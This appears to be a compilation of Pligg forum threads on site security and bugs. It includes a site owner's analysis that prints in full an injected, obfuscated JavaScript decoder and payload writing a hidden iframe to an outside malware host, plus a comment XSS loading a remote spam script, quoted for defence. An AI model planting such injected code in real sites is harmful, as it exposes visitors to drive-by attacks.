Recent Reports of pligg sites being hacked yet again

My pligg was hacked too. While I took the suggested measures in this forum I also dug in to find out what was going on.

The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:
<script language=”javascript”>
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t=”;for(i=0;i<s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}
</script>

The second part runs the function passing it a string that gets parsed and written as the following:
<iframe src=”http://sexonline.fake.hu/10/js_go_f1.php” style=”display:none”></iframe>

The full encoded script that produces the above looks like:
<script language=javascript>
document.write(unescape(‘%3C%73%63%72%69%70%74%20% 6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%2 8%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61% 70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C %65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E% 6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72 %69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%2 8%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74 %68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2 E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74% 29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%286 Fliudph%2853vuf%286G%2855kwws%286D22vh%7Brqolqh1id nh1kx2432mvbjrbi41sks%2855%2853vw%7Coh%286G%2855gl vsod%7C%286Dqrqh%2855%286H%286F2liudph%286H3′);
</script>

I have run across this before on some of the high volume sites that I manage. There are a lot of resources to tell you how to block the IP addresses of the common attackers, but that can always change.

The one successful way that we were able to get around it was to put a script in place that will cache your clean file structure, monitor it, and disallow any changes to it unless specified in the config file. It cannot “stop” the hacer, but it will ensure that if they do get in they cannot be successful in contaminating your site and scaring off your visitors.

http://forums.pligg.com/general-help/14309-my-pligg-site-hacked-2.html

You Can Submit same story/url twice.

During submission user can submit same story by posting once using www. and once without www.

http://forums.pligg.com/bug-report/15119-minor-submit-same-story-url-twice.html

double vote made easy on a pligg based website

There is a problem in the voting system that compromises all not-so-huge pligg-based communities.

When an identified user votes, checks are made not to allow him to vote twice. This works as well when an anonymous user votes, on the IP basis.

But when an identified user votes, then disconnects (or open the app in an other browser), he can vote twice as anonymous.

This is a problem for all localized or specialized communities that have ten or so votes per link.

- tested version: 9.9.5

- way to reproduce:
1. login
2. vote
3. logout
4. vote

http://forums.pligg.com/bug-report/14871-double-vote-made-easy.html

dollars5 disappeared?

Anyone been dealing with dollars5 lately? I payed them to build some custom features for my pligg site and needed some changes made and have been emailing them and havent heard from them in six days, Ive sent 5 emails and havent gotten a single reply, any idea where they might be?!?

http://forums.pligg.com/off-topic/15181-dollars5-disappeared.html

XSS vulnerability on comment?

I upgraded mysite to 9.9.5 a few days ago,and still the spam comes.
When I went to admin_comments.php.the page automatic redirect to a spam site.
I check the html code of admin_comments.php and found that spammer insert a script(http://bigbigsavings.info/rd.js) in the comment.

Visit: XSS vulnerability on comment?